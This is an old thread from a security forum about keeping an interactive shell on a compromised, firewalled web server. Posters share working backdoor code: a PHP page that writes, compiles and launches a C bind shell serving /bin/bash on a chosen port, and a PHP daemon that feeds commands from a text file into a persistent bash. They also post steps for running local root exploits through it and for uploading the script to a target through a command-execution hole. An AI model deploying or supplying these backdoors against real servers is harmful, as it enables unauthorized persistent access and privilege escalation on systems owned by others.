Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
September 18, 2014
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: marioxx06
New Today: 0
New Yesterday: 0
Overall: 8955

People Online:
Visitors: 160
Members: 0
Total: 160
milw0rm
·[web applications] - Dolphin 7.1.4 SQL Injection Vulnerability
·[web applications] - web2Project 3.1 SQL Injection Vulnerability
·[remote exploits] - Ericom AccessNow Server Buffer Overflow Exploit
·[dos / poc] - Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability
·[local exploits] - docker 0.11 VMM-container Breakout
·[remote exploits] - Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability
·[remote exploits] - Rocket Servergraph Admin Center fileRequestor Remote Code Execution
·[web applications] - Motorola SBG901 Wireless Modem - CSRF Vulnerability
·[web applications] - ZTE WXV10 W300- Multiple Vulnerabilities
·[remote exploits] - Java Debug Wire Protocol Remote Code Execution Exploit

read more...
PacketStorm News
·Ubuntu Security Notice USN-2249-1
·Red Hat Security Advisory 2014-0764-01
·Ubuntu Security Notice USN-2248-1
·CDVI ACAC22 Authentication / Denial Of Service
·Red Hat Security Advisory 2014-0763-01
·Red Hat Security Advisory 2014-0762-01
·PayPal SecurityKey Card Serialnumber Module Code Injection
·SugarCRM 6.5.16 XXE Injection
·Debian Security Advisory 2963-1
·Debian Security Advisory 2962-1

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Shell commands injection -> Interactive shell on php
Post new topic  Reply to topic View previous topic :: View next topic 
Interactive shell on php
PostPosted: Fri Apr 08, 2005 11:08 pm Reply with quote
erg0t
Valuable expert
Valuable expert
 
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




I post this to discuss methods of getting something like an interactive shell via php.
It?ll very usefull for servers with very restrictive firewalls that don?t allow you to use any kind of backdoor (either reverse, or non TCP backdoors), so the only way to do sometihing is via the php shell.

The method I use to get root and make some things is the following:

echo "cd /dir_of_the_xpl" > commands
echo "./xpl" >> commands
# And here the commands, for example...
echo "id" >> commands
echo "ls /root" >> commands
# And then
cat commands | /bin/bash -i

is a very uncomfortable way, but works for me
It?ll nice if you have any ideas to try to make an interactive shell in php (the only place I could put an interactive shell was in an irc bot y made in C, forking and using pipes, but in php you are more restricted). Is a good proyect to try...?any ideas?
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Apr 09, 2005 4:59 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




I dont have any ideas but I must admit its a firken cool idea.
C you have more options but I truely like php more.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
Re: Interactive shell on php
PostPosted: Sat Apr 09, 2005 3:07 pm Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




erg0t wrote:
I post this to discuss methods of getting something like an interactive shell via php.
It?ll very usefull for servers with very restrictive firewalls that don?t allow you to use any kind of backdoor (either reverse, or non TCP backdoors), so the only way to do sometihing is via the php shell.

The method I use to get root and make some things is the following:

echo "cd /dir_of_the_xpl" > commands
echo "./xpl" >> commands
# And here the commands, for example...
echo "id" >> commands
echo "ls /root" >> commands
# And then
cat commands | /bin/bash -i

is a very uncomfortable way, but works for me
It?ll nice if you have any ideas to try to make an interactive shell in php (the only place I could put an interactive shell was in an irc bot y made in C, forking and using pipes, but in php you are more restricted). Is a good proyect to try...?any ideas?


sorry , i dont understand what are u trying to explain
from what i see u just running exploit , then u get some root account by using "id" to check that

so ? what is the interensting point ?
or maybe i just dont get what u mean

if u need some more good "php shell" that more interactive n without restiction/break the restriction, u need to start browsing more to this forum, coz we've allready discuss it

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sat Apr 09, 2005 3:47 pm Reply with quote
LINUX
Moderator
Moderator
 
Joined: May 24, 2004
Posts: 404
Location: Caiman




yes is very good method for root servers whit firewall or not possible for reverse shell

in one file .txt add this content
-------------------------------------------------
echo "cd /dir_of_the_xpl" > commands
echo "./xpl" >> commands
# And here the commands, for example...
echo "id" >> commands
echo "ls /root" >> commands
-----------------------------------------------------
final command is: cat commands | /bin/bash -i

whit line run all commands in txt file, for what ergot run this ? simple for this server have firewall not is possible exec one backdoor and not possible exec reverse shell is very good method

good ergot and me , need more ideas for develop one irc bot or similar

PD: normal irc bot or phpshell not is possible get root in one server, for get root need linux shell


if one waraxe member need share ideas for this theme connect in IPV6.GIGACHAT.NET 6667 #uruguay
or SSL connection /server -e irc.gigachat.net 6697 ou /server irc.gigachat.net +6697 #Gigachat
channel #uruguay or contact whit me in channels #asc #infektion #simiens
View user's profile Send private message Visit poster's website
Re: Interactive shell on php
PostPosted: Sat Apr 09, 2005 10:41 pm Reply with quote
erg0t
Valuable expert
Valuable expert
 
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




y3dips wrote:
erg0t wrote:
I post this to discuss methods of getting something like an interactive shell via php.
It?ll very usefull for servers with very restrictive firewalls that don?t allow you to use any kind of backdoor (either reverse, or non TCP backdoors), so the only way to do sometihing is via the php shell.

The method I use to get root and make some things is the following:

echo "cd /dir_of_the_xpl" > commands
echo "./xpl" >> commands
# And here the commands, for example...
echo "id" >> commands
echo "ls /root" >> commands
# And then
cat commands | /bin/bash -i

is a very uncomfortable way, but works for me
It?ll nice if you have any ideas to try to make an interactive shell in php (the only place I could put an interactive shell was in an irc bot y made in C, forking and using pipes, but in php you are more restricted). Is a good proyect to try...?any ideas?


sorry , i dont understand what are u trying to explain
from what i see u just running exploit , then u get some root account by using "id" to check that

so ? what is the interensting point ?
or maybe i just dont get what u mean

if u need some more good "php shell" that more interactive n without restiction/break the restriction, u need to start browsing more to this forum, coz we've allready discuss it


The point is, when you call system(), etc, you don?t have an interactive shell, for example, if you make system("cd /tmp") ; and then system("pwd") ; (if the script isn?t in /tmp of course) the pwd call will not return /tmp.
Because after system returns the shell is killed.
This is a problem when you try to use local exploits, so the idea is to try to make an interactive shell.
I was thinking for example keep runing an /bin/bash -i in second plane, redirecting the input and output to temporaly files, and reading and writing them.

I did something like using pipes in C bot im developing.
You can see the sources in http://saure.no-ip.org/tools/eva/eva.c and http://saure.no-ip.org/tools/eva/eva.h (if you can?t enter is becuase my server is d onw in the moment so try later).
I don?t know if is posibly to make somethin like it in php, but we need to try Very Happy
View user's profile Send private message Send e-mail Visit poster's website
Re: Interactive shell on php
PostPosted: Sun Apr 10, 2005 3:18 am Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




erg0t wrote:

The point is, when you call system(), etc, you don?t have an interactive shell, for example, if you make system("cd /tmp") ; and then system("pwd") ; (if the script isn?t in /tmp of course) the pwd call will not return /tmp.
Because after system returns the shell is killed.
This is a problem when you try to use local exploits, so the idea is to try to make an interactive shell.
I was thinking for example keep runing an /bin/bash -i in second plane, redirecting the input and output to temporaly files, and reading and writing them.

I did something like using pipes in C bot im developing.
You can see the sources in http://saure.no-ip.org/tools/eva/eva.c and http://saure.no-ip.org/tools/eva/eva.h (if you can?t enter is becuase my server is d onw in the moment so try later).
I don?t know if is posibly to make somethin like it in php, but we need to try Very Happy


now , i got the point
doin some backdooring rait ?

you can do it with php but you have to run the script (web browser) all the time Laughing (or you need to run it when u need to enter)
ive seen some php shell doin that, just binding to one port (but not reverse like LINUX said )

maybe something like this

Code:


/* Bind Shell on port */


$port_bind_bd_c="
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
int main(argc,argv)
int argc;
char **argv;
{
int sockfd, newfd;
char buf[30];
struct sockaddr_in remote;
if(argc < 3) usage(argv[0]);
if(fork() == 0) { // Ответвляем новый процесс
remote.sin_family = AF_INET;
remote.sin_port = htons(atoi(argv[1]));
remote.sin_addr.s_addr = htonl(INADDR_ANY);
sockfd = socket(AF_INET,SOCK_STREAM,0);
if(!sockfd) perror(\"socket error\");
bind(sockfd, (struct sockaddr *)&remote, 0x10);
listen(sockfd, 5);
while(1)
{
newfd=accept(sockfd,0,0);
dup2(newfd,0);
dup2(newfd,1);
dup2(newfd,2);
write(newfd,\"Password:\",10);
read(newfd,buf,sizeof(buf));
if (!chpass(argv[2],buf))
system(\"echo welcome to r57 shell && /bin/bash -i\");
else
fprintf(stderr,\"Sorry\");
close(newfd);
}
}
}
int usage(char *progname)
{
fprintf(stderr,\"USAGE:%s <port num> <password>\n\",progname);
exit(0);
}
int chpass(char *base, char *entered) {
int i;
for(i=0;i<strlen(entered);i++)
{
if(entered[i] == '\n')
entered[i] = '\0';
}
if (!strcmp(base,entered))
return 0;
}";


?>

<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>Bind port to /bin/bash</div></b></font></td></tr>
<tr><td>
<?
/* port bind form */
echo "<form name=bind method=POST>";
echo "<font face=Verdana size=-2>";
echo "<b>Port <font face=Wingdings color=gray>и</font></b>";
echo "<input type=text name=port size=15 value=55556> ";
echo "<b> Password <font face=Wingdings color=gray>и</font>    </b>";
echo "<input type=text name=bind_pass size=15 value=> ";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
echo "<input type=hidden name=bind size=1 value=bd.c>";
echo "      <input type=submit name=submit value=\" Bind \">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>

<?
if (($_POST['bind']) AND ($_POST['bind']=="bd.c") AND ($_POST['port']) AND ($_POST['bind_pass']))
{
 $w_file=fopen("/tmp/bd.c","ab+") or exit();
 fputs($w_file,$port_bind_bd_c);
 fclose($w_file);
 $_POST['cmd']="cd /tmp/; gcc -o bd bd.c; ./bd ".$_POST['port']." ".$_POST['bind_pass']."; ps -aux | grep bd";
}
?>

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sun Apr 10, 2005 4:03 am Reply with quote
erg0t
Valuable expert
Valuable expert
 
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




Are you saying to run a backdoor and connect to it with a client runing from the same machine and doing the client in php?
So, locally bypass the firewall?
Is a good Idea but in this case better using UNIX sockets, or fifos or something else.
I think the better choice is UNIX sockets because they are bidirectional so with one socket you can do the same that with 2 pipes or fifos.

So the way that you propose to follow is to make an server in other language, and the client only in php.
Is a very good idea but it?ll REALY COOL to try to make all in php. Very Happy
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Apr 10, 2005 11:29 am Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




erg0t wrote:
Are you saying to run a backdoor and connect to it with a client runing from the same machine and doing the client in php?
So, locally bypass the firewall?
Is a good Idea but in this case better using UNIX sockets, or fifos or something else.
I think the better choice is UNIX sockets because they are bidirectional so with one socket you can do the same that with 2 pipes or fifos.

So the way that you propose to follow is to make an server in other language, and the client only in php.
Is a very good idea but it?ll REALY COOL to try to make all in php. Very Happy


no, here the scenario..
- save the script as bd.php in "target " machine
- then access it with your browser to , eg : http://lame.com/phpbb/bd.php
- then input the port , password n running the port binding
- open your shell , then do some telnet to http://lame.com [port]

its just another bindtelnet but running on webserver

thats all

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sun Apr 10, 2005 2:56 pm Reply with quote
erg0t
Valuable expert
Valuable expert
 
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




But we are talking about firewalled servers, we can?t use backdoors, this is why this thread Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Apr 10, 2005 7:28 pm Reply with quote
Heintz
Valuable expert
Valuable expert
 
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden




its quite hard to understand what you try to achive here, but at first i made a
usual tcp backdoor in php5 (if you're interested i still have it). but then (i think)
i understood what you needed. a shell thorught php (web security hole) which would not dissappear. but you cant put a backdoor because of firewalls and only thing you got is that security hole.
anyway heres code:

Code:

<?php
/*
By Heintz to http://www.waraxe.us.
in.txt is file where you put (echo "pwd" > in.txt) commands.
predefined commands:
"quit" - will stop the demon.
"clear" - truncates out.txt
out.txt is where you get results from bash

this is little demon that "listens" to in.txt as it would be binded to some port ;)
*/

set_time_limit(0);

$in = 'in.txt';
$bashout = 'out.txt';

$bashin = popen('bash > ' . $bashout, 'w');
if($bashin == false)
{
        echo "could not open bash\n";
        exit(1);
}

while(1)
{
        clearstatcache();
        $read = stat($in);

        if($read['size'] > 0)
        {
                $script_in = fopen($in, 'r');
                while(flock($script_in, LOCK_EX) == false)
                {
                        sleep(1);
                }

                $data = fread($script_in, filesize($in));
                flock($script_in, LOCK_UN);
                fclose($script_in);

                @fclose(@fopen($in, 'w')); // truncate

                $data = trim($data);

                if($data == 'quit')
                {
                        break;
                }
                elseif($data == 'clear')
                {
                        fclose(fopen($bashout, 'w'));
                        continue;
                }

                fputs($bashin, $data . "\n");

        }

        sleep(1);

}

@pclose($bashin);
exit();
?>


i hope this is the thing you were after Question Smile

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Sun Apr 10, 2005 8:02 pm Reply with quote
erg0t
Valuable expert
Valuable expert
 
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




I THINK YOU MAKE IT MAN!
I don?t know php but i think I understood your code and I?m sure that it?s what I was looking for.
Congratulations and thankyou!
salu2
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Apr 11, 2005 3:00 am Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




erg0t wrote:
But we are talking about firewalled servers, we can?t use backdoors, this is why this thread Smile


yupe, but if u use php shell or even cgi-telnet , u wont need to think about firewall, because port 80 always open Smile

if u want some reverse shell to ure machine with php , i still dont find it

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Mon Apr 11, 2005 3:10 am Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




Heintz : i understand your script , n i already try it, but it wont work

here the scenario :
1. i copy your script to bd.php
2. i make in.txt and out.txt with permission 777 (????? <-- koz, web server will write to this file , insecurity ???? )
3. i make some command n put into in.txt ? (am i right ?)
for example
//in.txt---
echo "pwd" > out.txt

4. i run my web browser , point the url to http://loclahost/~y3dips/bd.php
5. what i got here ?
- the page are stalled (bd.php are processing without any output in browser , i understand about this )
- script running
#ps -axf

4320 ? S 0:00 \_ /usr/sbin/httpd
4398 ? S 0:00 | \_ sh -c bash > out.txt
4399 ? S 0:00 | \_ bash

but, nothing output when i tail to out.txt
# tail -f public_html/out.txt


CMIIW

give me some short n real scenario , so i can try
sorry for my dumb question

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Mon Apr 11, 2005 12:13 pm Reply with quote
Heintz
Valuable expert
Valuable expert
 
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden




heres how you should use it

lets say you got a vulnearability in site "a", which lets you execute commands through one of php program execution programs lets say system().
but the site "a" got firewall which doesn't allow anything other than webserver connect to server or from server. so you cant create a backdoor.
this is where this script comes in handy. lets say you echo or wadeva get this thing up to site a/script.php and manage to execute it (either from command line or by visiting it from web). now you start giveing it commands "through" that vulnearability. like system('echo "pwd" > in.txt'); this script reads the command from in.txt and executes it and returns output to out.txt. and you could then read out.txt like system('cat out.txt'); but the script runs all the time so your shell "stays". so now you can give it manually commands.


edit:
this script is not supposed to be a all-platform ready to use app. there may be php safe mode which i have not tested and so on. this is where your own skills come in. i just showed one way to make a solution to this kind of problem.

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
Interactive shell on php
  www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.121 Seconds